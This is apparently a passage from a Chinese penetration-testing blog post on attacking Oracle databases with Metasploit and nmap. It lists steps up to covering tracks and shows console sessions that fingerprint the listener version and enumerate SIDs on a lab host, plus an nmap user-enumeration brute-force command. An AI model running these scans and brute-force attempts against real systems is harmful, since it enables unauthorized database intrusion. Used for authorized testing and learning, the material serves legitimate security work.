2. Determine Oracle Version
3. Determine Oracle SID
4. Guess/Bruteforce USER/PASS
5. Privilege Escalation via SQL Injection
6. Manipulate Data/Post Exploitation
7. Cover Tracks
++++++++++++++++++++++++++++++++++Determine Oracle Version
msf > use auxiliary/scanner/oracle/
use auxiliary/scanner/oracle/emc_sid use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/isqlplus_login use auxiliary/scanner/oracle/spy_sid
use auxiliary/scanner/oracle/isqlplus_sidbrute use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/oracle_hashdump use auxiliary/scanner/oracle/xdb_sid
use auxiliary/scanner/oracle/oracle_login use auxiliary/scanner/oracle/xdb_sid_brute
use auxiliary/scanner/oracle/sid_brute
msf > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > show options
Module options (auxiliary/scanner/oracle/tnslsnr_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(tnslsnr_version) > run
[+] 192.168.1.100:1521 Oracle - Version: 32-bit Windows: Version 9.2.0.1.0 - Production
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
++++++++++++++++++++++++++++++++++Determine Oracle SID
msf auxiliary(tnslsnr_version) > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(sid_enum) > set THREADS 8
THREADS => 8
msf auxiliary(sid_enum) > show options
Module options (auxiliary/scanner/oracle/sid_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.100 yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 8 yes The number of concurrent threads
msf auxiliary(sid_enum) > run
[+] Identified SID for 192.168.1.100:1521 ["PLSExtProc"]
[+] Identified SID for 192.168.1.100:1521 ["dbnis"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["PLSExtProc"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnis"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnisXDB"]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
................
SID 获取后,下一步就是尝试猜解Oracle User/Password, 如果成功获取用户名,可尝试登陆并提权。 关于上述内容的具体描述请查阅下面的pdf.
metasploit在做口令猜解时,调用了nmap的脚本,namp中关于oracle的可用脚本如下所示:
root@gnu:~# ls -l /usr/share/nmap/scripts/*oracle*
-rw-r--r-- 1 root root 7159 Dec 6 2013 /usr/share/nmap/scripts/oracle-brute.nse
-rw-r--r-- 1 root root 6465 Dec 6 2013 /usr/share/nmap/scripts/oracle-brute-stealth.nse
-rw-r--r-- 1 root root 4615 Dec 6 2013 /usr/share/nmap/scripts/oracle-enum-users.nse
-rw-r--r-- 1 root root 4892 Dec 6 2013 /usr/share/nmap/scripts/oracle-sid-brute.nse
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=dbnis,userdb=oracle_default_users.txt -p 1521 192.168.1.100
参考链接:
http://pentestlab.wordpress.com/category/information-gathering/
http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
